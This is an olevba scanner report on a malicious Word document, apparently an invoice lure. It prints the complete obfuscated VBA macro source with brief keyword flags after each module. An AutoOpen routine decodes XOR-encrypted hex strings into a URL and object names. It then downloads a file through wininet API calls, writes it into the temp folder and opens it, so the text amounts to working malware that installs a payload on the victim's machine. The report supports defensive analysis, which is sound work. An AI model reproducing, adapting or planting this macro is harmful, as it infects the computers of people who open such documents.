Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- inv_30~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: inv_30~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub VICTOR(MARTIN As Long)
17. JEREMY
18. End Sub
19.  
20. Sub autoopen()
21. VICTOR 544
22. End Sub
23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
24. ANALYSIS:
25. +----------+----------+---------------------------------------+
26. | Type     | Keyword  | Description                           |
27. +----------+----------+---------------------------------------+
28. | AutoExec | AutoOpen | Runs when the Word document is opened |
29. +----------+----------+---------------------------------------+
30. -------------------------------------------------------------------------------
31. VBA MACRO OIDL8.bas
32. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/OIDL8'
33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
34.  
35. Public Function JEFFERY() As Object
36. Dim LAWRENCE As String
37. LAWRENCE = ALBERT(EDDIE, EDWIN)
38. Set JEFFERY = CreateObject(LAWRENCE)
39. End Function
40.  
41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
42. ANALYSIS:
43. +------------+--------------+--------------------------+
44. | Type       | Keyword      | Description              |
45. +------------+--------------+--------------------------+
46. | Suspicious | CreateObject | May create an OLE object |
47. +------------+--------------+--------------------------+
48. -------------------------------------------------------------------------------
49. VBA MACRO PIDLE0.bas
50. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/PIDLE0'
51. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
52. Public Function JEFF(ByRef NICHOLAS As Object) As Object
53. Set JEFF = NICHOLAS.GetSpecialFolder(2)
54. End Function
55. Sub ROY(CALEIGH As Long)
56.  
57. BENJAMIN ("BRUCE")
58. End Sub
59.  
60.  
61. Public Function BENJAMIN(VINCENTs As String)
62. VINCENT
63. End Function
64.  
65.  
66. Public Function ALBERT(BRANDON As String, ADAM As String) As String
67.    
68.     Dim TONY As Integer
69.     Dim LUIS As Integer
70.    
71.    
72.     Dim WAYNE As Double
73. For WAYNE = 42 To 43
74. If WAYNE = 32 Then End
75. Next WAYNE
76.    
77.     Dim BILLY As Long
78.     Dim STEVE As String
79.     For BILLY = 1 _
80.     To _
81.     ( _
82.     ANTONIO _
83.     (ADAM) _
84.     / 2)
85.         TONY = CHRIS(ADAM, BILLY)
86.         LUIS = EARL(BRANDON, BILLY)
87.         STEVE = STEVE + PHILIP(TONY, LUIS)
88.     Next BILLY
89.    ALBERT = STEVE
90. End Function
91.  
92.  
93. Sub JEREMY()
94.         Dim AARON As Long
95.  
96.     Dim RANDY As Integer
97. For RANDY = 414 To 416
98. If RANDY = 1312 Then End
99. Next RANDY
100.  
101. ROY (5)
102.  
103. End Sub
104.  
105.  
106.  
107.  
108.  
109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
110. ANALYSIS:
111. No suspicious keyword or IOC found.
112. -------------------------------------------------------------------------------
113. VBA MACRO IDL4.bas
114. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/IDL4'
115. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
116.  
117.  
118.  
119. Public Function EARL(ByRef BRANDON As String, ByRef BILLY As Long) As Integer
120. EARL = Asc(JIMMY(BRANDON, _
121.         ((BILLY Mod ANTONIO(BRANDON)) + 1), 1))
122. End Function
123. Public Function VINCENT()
124.  
125. Dim MELVIN As Object
126.  
127.  
128.     Dim JESUS As Integer
129. For JESUS = 84 To 85
130. JESUS = JESUS + 15
131. Next JESUS
132.    
133.  
134. Dim GLENN  As Object
135.  
136.  
137. For JESUS = 70 To 71
138. JESUS = JESUS + 5
139. Next JESUS
140.    
141.  
142. Set GLENN _
143. = JEFFERY()
144.  
145. For JESUS = 72 To 73
146. JESUS = JESUS + 8
147. Next JESUS
148. Set MELVIN = JEFF(JEFFERY)
149.  
150. Dim CHAD
151. Dim JACOB
152. JACOB = EUGENE(1024, EDDIE, FREDERICK)
153.  
154. For JESUS = 92 To 93
155. JESUS = JESUS + 9
156. Next JESUS
157. CHAD = MELVIN & JACOB
158.  
159.  
160. If FRANCIS(GLENN, CHAD) Then
161. GLENN. _
162. DeleteFile CHAD
163. End If
164. If DALE(CHAD) Then
165. End If
166. If FRANCIS(GLENN, CHAD) Then
167. End If
168. Dim RALPH
169. Set RALPH = CreateObject _
170. (ALBERT _
171. (EDDIE, HERBERT))
172. RALPH.Open CHAD
173. End Function
174.  
175.  
176.  
177.  
178.  
179.  
180. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
181. ANALYSIS:
182. +------------+--------------+--------------------------+
183. | Type       | Keyword      | Description              |
184. +------------+--------------+--------------------------+
185. | Suspicious | CreateObject | May create an OLE object |
186. | Suspicious | Open         | May open a file          |
187. +------------+--------------+--------------------------+
188. -------------------------------------------------------------------------------
189. VBA MACRO FILE6.bas
190. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/FILE6'
191. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
192.  
193. Option Explicit
194.  
195.  
196. Public Const HERBERT = "122F222E3B77142635223E2A29352E282C"
197. Public Const FREDERICK = "1D352E38383B6478756032312D"
198. Public Const JOEL = "293333326D767A3721223E3D213124222C3623307826213A667B74746874626D7B333D2B"
199. Public Const EDWIN = "1224352B272D3C38226011202424143E31233C38192724322A3C"
200. Public Const EDDIE = "HAGGBWYUVENWI"
201.  
202. Public Const JAMES = "JOHN"
203.  
204. #If VBA7 And Win64 Then
205. Public _
206. Declare _
207. PtrSafe _
208. Function _
209. ROBERT Lib _
210. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
211. Public _
212. Declare _
213. PtrSafe _
214. Function _
215. MICHAEL Lib _
216. "wininet.dll" Alias "InternetOpenA" (ByVal CHARLES As String, ByVal MARVINPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As LongPtr
217. Public _
218. Declare _
219. PtrSafe _
220. Function _
221. WILLIAM Lib _
222. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
223. Public _
224. Declare _
225. PtrSafe _
226. Function _
227. DAVID Lib _
228. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
229. #Else
230. Public Declare Function ROBERT Lib "wininet.dll" _
231. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
232. Public Declare Function MICHAEL Lib "wininet.dll" _
233. Alias "InternetOpenA" (ByVal CHARLES As String, ByVal MARVINPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As Long
234. Public Declare Function WILLIAM Lib "wininet.dll" _
235. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
236. Public Declare Function DAVID Lib "wininet.dll" _
237. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
238. #End If
239.  
240.  
241.  
242. Private Const MANUEL = 8162
243. Private Const RODNEY As String = "CURTIS"
244. Private Const NORMAN = 1
245. Private Const ALLEN = &H4000000
246.  
247. Public Function DALE _
248. (ByVal MARVIN As String) As Boolean
249.     #If VBA7 _
250.     And Win64 Then
251.         Dim LEONARD As LongPtr, STANLEY As LongPtr
252.     #Else
253.         Dim LEONARD As Long, STANLEY As Long
254.     #End If
255.     Dim FRANK As Long
256.     Dim MARK As String * MANUEL, CHARLES As String
257.     Dim MIKE As Integer, NATHAN As Double
258.     LEONARD = VINNIPUH
259.     If LEONARD = 0 Then
260.         Exit Function
261.     End If
262.     Dim STEPHEN As Boolean
263.    
264.     If ANDREW(STANLEY, LEONARD) Then
265.     End If
266.     If STANLEY = 0 Then
267.         NATHAN = 0
268.     Else
269.         WILLIAM STANLEY, MARK, MANUEL, FRANK
270.         CHARLES = MARK
271.           Dim RAYMOND As Long
272. For RAYMOND = 321 To 322
273. If RAYMOND = 1232 Then End
274. Next RAYMOND
275.         Do While FRANK <> 0
276.             WILLIAM STANLEY, MARK, MANUEL, FRANK
277.                     CHARLES = CHARLES + Mid(MARK, 1, FRANK)
278.         Loop
279.              NATHAN = ANTONIO(CHARLES): _
280.              MIKE = DANNY("JERRY")
281.         Open MARVIN _
282.             For Binary Access Write _
283.         Lock Write _
284.         As #MIKE
285.         Put #MIKE, _
286.                 , CHARLES
287.         Dim DENNIS As Double
288.             For DENNIS = 42 To 43
289.     If DENNIS = 437 Then End
290. Next DENNIS
291.         Close #MIKE
292.     End If
293.     ROBERT STANLEY
294.     ROBERT LEONARD
295.     CHARLES = ""
296.     If NATHAN Then
297.         DALE = True
298.     End If
299. End Function
300.  
301. Public Function PHILIP(ByRef TONY As Integer, ByRef LUIS As Integer) As String
302.     PHILIP = Chr(TONY Xor LUIS)
303. End Function
304.  
305. Public Function CHRIS(ByRef ADAM As String, ByRef BILLY As Long) As Integer
306.  CHRIS = Val("&H" & (JIMMY(ADAM, JOHNNY(BILLY), 2)))
307. End Function
308. Public Function JOHNNY(ByRef BILLY As Long) As Long
309.  JOHNNY = (2 * BILLY) - 1
310. End Function
311.  
312.  
313. Public Function JIMMY(ByRef BRYAN As String, ByRef TONY As Integer, ByRef LUIS As Integer) As String
314.     JIMMY = Mid$(BRYAN, TONY, LUIS)
315. End Function
316.  
317. Public Function ANTONIO(BRYAN As String) As Long
318. ANTONIO = Len(BRYAN)
319. End Function
320. Public Function DANNY(BRYAN As String) As Integer
321.     DANNY = FreeFile
322. End Function
323.  
324.  
325.  
326.  
327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
328. ANALYSIS:
329. +------------+----------------+-----------------------------------------+
330. | Type       | Keyword        | Description                             |
331. +------------+----------------+-----------------------------------------+
332. | Suspicious | Lib            | May run code from a DLL                 |
333. | Suspicious | Open           | May open a file                         |
334. | Suspicious | Write          | May write to a file (if combined with   |
335. |            |                | Open)                                   |
336. | Suspicious | Put            | May write to a file (if combined with   |
337. |            |                | Open)                                   |
338. | Suspicious | Chr            | May attempt to obfuscate specific       |
339. |            |                | strings                                 |
340. | Suspicious | Xor            | May attempt to obfuscate specific       |
341. |            |                | strings                                 |
342. | Suspicious | Binary         | May read or write a binary file (if     |
343. |            |                | combined with Open)                     |
344. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
345. |            |                | be used to obfuscate strings (option    |
346. |            |                | --decode to see all)                    |
347. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
348. |            |                | may be used to obfuscate strings        |
349. |            |                | (option --decode to see all)            |
350. | IOC        | wininet.dll    | Executable file name                    |
351. +------------+----------------+-----------------------------------------+
352. -------------------------------------------------------------------------------
353. VBA MACRO IDL3.bas
354. in file: inv_30~1.doc - OLE stream: u'Macros/VBA/IDL3'
355. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
356.  
357. Public Function FRANCIS(ByRef RYAN As Object, ByVal ROGER As String) As Boolean
358. If RYAN.FileExists(ROGER) Then
359. FRANCIS = True
360. Else
361. FRANCIS = False
362. End If
363. End Function
364. #If VBA7 _
365.     And Win64 Then
366.        Public Function ANDREW(ByRef JOE As LongPtr, JUAN As LongPtr) As Boolean
367.     #Else
368.        Public Function ANDREW(ByRef JOE As Long, JUAN As Long) As Boolean
369.     #End If
370. Dim JACK As String
371. Dim HOWARD As Long
372.     JACK _
373.     = EUGENE(325, EDDIE, JOEL)
374.    
375.                 JOE _
376.     = DAVID _
377.     ( _
378.     JUAN, _
379.     JACK, vbNullString, _
380.     0, _
381.     ALLEN, 0)
382.     ANDREW = True
383. End Function
384.  
385. #If VBA7 _
386.     And Win64 Then
387. Public Function VINNIPUH() As LongPtr
388.  #Else
389. Public Function VINNIPUH() As Long
390.  
391.  #End If
392.  
393.  VINNIPUH = MICHAEL(RODNEY, NORMAN, vbNullString, vbNullString, 0)
394. End Function
395.  
396. Public Function EUGENE(BOBBY As Long, CARLOS As String, RUSSELL As String) As String
397. EUGENE = ALBERT(CARLOS, RUSSELL)
398.    
399. End Function
400.  
401.  
402.  
403.  
404.  
405.  
406. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
407. ANALYSIS:
408. No suspicious keyword or IOC found.